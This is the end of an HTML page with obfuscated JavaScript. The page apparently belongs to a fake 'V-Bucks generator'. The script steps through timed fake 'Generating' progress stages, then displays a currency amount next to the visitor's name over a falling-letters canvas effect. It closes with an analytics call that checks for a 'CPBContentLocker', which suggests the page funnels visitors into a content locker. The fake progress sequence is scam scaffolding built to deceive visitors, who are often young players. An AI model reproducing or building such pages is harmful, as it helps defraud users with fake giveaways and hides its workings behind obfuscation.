_0x4995d3=_0x18e8ab;document[_0x4995d3(0xa0)]('Generating-step0')[_0x4995d3(0xdb)]=_0x4995d3(0xbb),document[_0x4995d3(0xa0)](_0x4995d3(0xc2))[_0x4995d3(0xd7)][_0x4995d3(0xc0)]('progressbar75'),setTimeout(function(){var _0x1ddf0d=_0x4995d3;document[_0x1ddf0d(0xa0)](_0x1ddf0d(0x98))[_0x1ddf0d(0xdb)]=_0x1ddf0d(0xa7),document[_0x1ddf0d(0xa0)](_0x1ddf0d(0xc2))[_0x1ddf0d(0xd7)][_0x1ddf0d(0xc0)](_0x1ddf0d(0x9a)),document[_0x1ddf0d(0xa0)](_0x1ddf0d(0xc9))[_0x1ddf0d(0xa3)]['display']=_0x1ddf0d(0xe5),setTimeout(function(){var _0x218020=_0x1ddf0d;document[_0x218020(0xa0)](_0x218020(0xb7))[_0x218020(0xa3)][_0x218020(0xe9)]=_0x218020(0xc3),setTimeout(function(){var _0x305523=_0x218020;document[_0x305523(0xa0)](_0x305523(0xb9))[_0x305523(0xa3)][_0x305523(0xe9)]='block',document[_0x305523(0xa0)](_0x305523(0x99))[_0x305523(0xdb)]=vbucksValue,document[_0x305523(0xa0)](_0x305523(0xd2))['innerHTML']=name,document[_0x305523(0xa0)](_0x305523(0xd1))[_0x305523(0xdb)]=vbucksValue;},0x64);},0xbb8);},0xbb8);},0x1388);},0xfa0);},0x3e8);}var canvas=document[_0x548055(0xe2)](_0x548055(0xad)),ctx=canvas[_0x548055(0xd8)]('2d');canvas[_0x548055(0xcb)]=window['innerWidth'],canvas['height']=window[_0x548055(0x96)];var letters=_0x548055(0xc8);letters=letters[_0x548055(0x9f)]('');var fontSize=0xa,columns=canvas['width']/fontSize,drops=[];for(var i=0x0;i<columns;i++){drops[i]=0x1;}function draw(){var _0x41be15=_0x548055;ctx[_0x41be15(0xd4)]='rgba(0,\x200,\x200,\x20.1)',ctx[_0x41be15(0xae)](0x0,0x0,canvas[_0x41be15(0xcb)],canvas['height']);for(var _0x4a39be=0x0;_0x4a39be<drops[_0x41be15(0xba)];_0x4a39be++){var _0x24f44f=letters[Math[_0x41be15(0xde)](Math[_0x41be15(0xac)]()*letters[_0x41be15(0xba)])];ctx[_0x41be15(0xd4)]=_0x41be15(0xaf),ctx['fillText'](_0x24f44f,_0x4a39be*fontSize,drops[_0x4a39be]*fontSize),drops[_0x4a39be]++,drops[_0x4a39be]*fontSize>canvas[_0x41be15(0xe3)]&&Math[_0x41be15(0xac)]()>0.95&&(drops[_0x4a39be]=0x0);}}setInterval(draw,0x21);
</script>
<script>
    if(typeof window.ga === 'function'){
        ga('create', 'UA-85922709-2', 'auto', 'customTemplateGlobal');
        ga('customTemplateGlobal.set', 'dimension1', typeof window.CPBContentLocker === 'function' ? 0 : 1);
        ga('customTemplateGlobal.send', 'pageView');
    }


</script>
</body>
</html>
